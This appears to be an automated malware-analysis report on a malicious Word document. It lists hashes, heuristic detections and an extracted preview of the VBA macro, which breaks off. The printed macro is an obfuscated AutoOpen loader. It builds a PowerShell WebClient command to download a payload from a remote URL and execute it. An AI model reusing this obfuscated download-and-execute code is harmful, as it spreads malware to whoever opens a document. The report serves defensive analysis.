Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 802303f9b2510a2f…

MALICIOUS

Office (OLE)

Size: 135.0 KB
Created: 2018-02-15 00:33:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: 33b599349f7081f45249c2b5fd2ed089
SHA-1: 1ae28ed29db0b7eaa6b2669cfd5e65b3ad18dfe8
SHA-256: 802303f9b2510a2fbeb1ded869b143b7e7377bda24b755aa2a85856c2122e905
Risk Score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

A critical OLE_VBA_SHELL heuristic fired on the sample, indicating use of the Shell() function. In addition, an obfuscated auto-exec loader was detected, which points to malicious intent. The VBA script attempts to download a payload from a URL whose obfuscated form in the macro source is 'amLSTsowZHbPzSfpiS-immob9m4+9m4ilien.de/9m4+9m4J5c9m4+9m4GuUXiELlzSSjmicIjbOdjl' and to execute it, likely leading to further infection.

Heuristics (7)

  • VBA macros detected (medium; 4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader (critical) OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://9m4+9m4esenUpr [In document text (OLE body)]
    • http://real-expert.inf9m4mWc+mWc+9m4o9m4+9m4/9m4+9m4co9m4+9m4mp9m4+9m4on9m4+9m4ents/Pt09m4mWc+m [In document text (OLE body)]
    • http://schemas.openxmlformats.org/drawingml/2006/main [In document text (OLE body)]

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 26216 bytes
SHA-256: 7120fe1abcbaeee72667657b7b1087c85b80aa546088af999edd4b48f40028c4

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "lSajimqhmQYIO"
Function YYAfYup()
On Error Resume Next
iOETroDWbDf = (vERwzTt - Int(ssEGwz) * uJTGOcpAbYAdo / Oct(woArWf) - (KmqbEhknfiOLn - Sin(4698163)))
INDzBSluJBn = (jlmlFEpZwq - Int(vtDDPb) * EkWdfKuF / Oct(wumRAlV) - (PElalU - Sin(2385564)))
CUnKiRuQ = (lzmrkbOmtioGG - Int(bqArsf) * YEKXzo / Oct(qrTPKjt) - (IObUfzY - Sin(3493746)))
UwLANVsEi = (wncfklMIhSmCsB) + HJjkJKD("fscwLwrkVNHZiRX4ncbw+cbwlzmWcbw+cbwc+mWcV0O9m4mWc+'+'mWc+9m4adFIzV0lmWc+mWc9m4+9m4e9m4+9m4t9mWc+mWcm4+9m47W(cbw+'+'cbwc9m4+9m47tavzwf", 16, 114)
QozsMrAi = (AKzmNIwfh - Int(SZniAjPjvohaCX) * XTcwL / Oct(odEfYMI) - (LoIWBjq - Sin(7297935)))
pODlsLfUMoQ = (WfBBqbqa - Int(cjpoVi) * idwiwbTHT / Oct(zZEAoMlBGQK) - (zBOFRkZ - Sin(4576229)))
clVWbXALG = (SZATFtDTu - Int(uiGbQVG) * XDmPRLXjuUsK / Oct(ivNhADhiSii) - (EQdqawj - Sin(1986358)))
RuhwRk = (nEwBPZvWMRilQ) + HJjkJKD("amLSTsowZHbPzSfpiS-imm'+'ob9m4+9m4ilien.de/9m4+9m4J5c9m4+9m4GuUXiELlzSSjmicIjbOdjl", 19, 43)
TzbDGa = (pUWJznjbidsNl - Int(SzIabE) * wfhRlqzwfAuuC / Oct(fMRlpfKORYE) - (vlVwclqCroor - Sin(2834047)))
EuwtIRVKY = (icwdzTiZnnqpmY - Int(jOJMwuLdjXJ) * zsqYZ / Oct(sziPoalFV) - (iFmzRXHaifRCXz - Sin(3049169)))
oFzIwSKmviK = (oOihwO - Int(TubzTZjb) * YNudkJnckPuuE / Oct(aizimWWoBToTF) - (ZoAuDadJEmUib - Sin(1150339)))
ifKPsc = (suQSZFEVEDNu) + HJjkJKD("FWRodw[STRINg][cHAR]39))jzaD", 7, 18)
jzGXX = (dNOHuQrU - Int(SEAnJUJzwFtzdw) * ZiCAR / Oct(fksllGcpK) - (srbVN - Sin(749677)))
CXIuLHdhJf = (tcFBsY - Int(TzPLiQOr) * inTIC / Oct(NhInCBFCc) - (VUIXMTnMZSmr - Sin(3224698)))
CQQCkiPYs = (upAowi - Int(vGVOYtEWRNzmW) * vFTqLAG / Oct(klWQBtMAQFu) - (aNmJoZjqIFoEuu - Sin(9793381)))
jjOdPwiK = (oREzDwPzqiM) + HJjkJKD("dpXj9mmWc'+'+mWc4+9m4ectQEk) S9m4+9m4'+'yste9m4+9m4m.Net.We9m4+mWc+mWc9m4bC9'+'m4+9m4liecbw+cbwnt;c79m4+'+'9mcbw+cbw4tNScbw+cbwB9mmWc+mWc4+9m'+'4 cVYDzMQhXAaWJERUIiELBwlbbOwUBoNHhVw", 4, 144)
FurIoUhtS = (KBlQPafw - Int(WGudTSUL) * OrCQjh / Oct(hrIzLSIRQ) - (wzRYkrnal - Sin(7307131)))
zOHTcsa = (fwdWhUXq - Int(tUDshjWz) * DzdNzV / Oct(uiiAPqvv) - (Cuibiz - Sin(7256041)))
qbmVHd = (AccwZqBUnT - Int(omSzIBmmtqA) * ZIjfo / Oct(XcGLCMUtYVscf) - (XOHWjvWZrL - Sin(8595316)))
RQvILFZ = (JQwrsblh) + HJjkJKD("hTTzafhVtPHlpjR &( $ShELLID[1]+$sHELlID[13]+'x')(('. ( ([StrinG]xdCVerboSEpReFEilPu", 16, 64)
uifSjAArk = (BNwtVwl - Int(TSNvqkfiPCLhni) * dQGwZRcZbusm / Oct(NUHREfJRsj) - (slLBHMzWW - Sin(5222584)))
WSGimzjOpwz = (cPCMdrsm - Int(zwEUv) * ucHVVlhjDnFaRO / Oct(VPAvssOsCSYFjc) - (hrGLSUPBFjuiw - Sin(4820562)))
HrXUhJzc = (QaXDbiDYD - Int(fkFCw) * wEKFOUFwcGO / Oct(OzKPTiCzhfAKi) - (DImkJwJA - Sin(9247001)))
tqdGskWosz = (jFiPdRtQKYf) + HJjkJKD("vPXOiS,mWccbw+cbw+mWc9m4+9m4 uZhZuEicwkvRicj", 7, 23)
RFEWizwrPH = (EzbwRzJr - Int(PlNBjbzWGcGEfq) * HzOWTjzKC / Oct(YpsMiXSjYE) - (wEMoREuWr - Sin(2676785)))
jpJUvSJniRY = (IFoUinYNR - Int(KXIlHJcFoV) * lwLtBh / Oct(iDnKP) - (hmYKoiKKmwmjED - Sin(2055675)))
ZdOCRCW = (SQDsSWHdahFXjO - Int(zIJEUkRRJKww) * YMziq / Oct(kWHXjKfvjHY) - (aYImXuzqKAzu - Sin(6433804)))
BuXaEWsoZzG = (FtPRaAzw) + HJjkJKD("wrVvGAkuIbcqidvGKXswkvzmvrV+cbwRepLACEcbw+cbw(cbw+cbw9'+'m4cbw+cbwc7t9'+'m4,9m4rh59m4).RepLACE(9m4zPj'+'9m'+'4,cb'+'w+cbw[strIN'+'g]'+'mWc+mWc[CHAr]92) mWc+mWc)cbw+cbwmWc).REPlacE(mWccbw+cbwrh5LbicjRNF", 28, 166)
LGaRhGG = (WatmpCiAY - Int(WMpKlZrVXzF) * trumRFBWSp / Oct(JzzLSY) - (wjbuujvSIPw - Sin(2516290)))
JpHGvjlzw = (nSvjCrCkZwBR - Int(CjLoOZwrAYz) * wNqzwmZFDWrEQJ / Oct(WvXiZdNdPG) - (AXQvntvh - Sin(1104681)))
hdFGDRBDq = (MldMcMdjoH - Int(FwavdqaWj) * atclBoIjwIiD / Oct(KKtWzQkzazvvYq) - (KCVLWtlsAaaXUz - Sin(8222651)))
XcpdHPFzFu = (slduooiJk) + HJjkJKD("FjWc &9m4+c'+'bw+cbw9m4(9m4+9m4QEkn9m4+9m4Q9m4+9m4'+'Ek+QEk9m4cbw+cbw+9m4eQEkmWcbw'+'+cbwc+m'+'Wccbw+cbw+9m'+'4+9m4QEkw-o'+'bj'+'ecQEcbw+cbwk+QEktQmWccbw+cbw+mWc9m
... (truncated)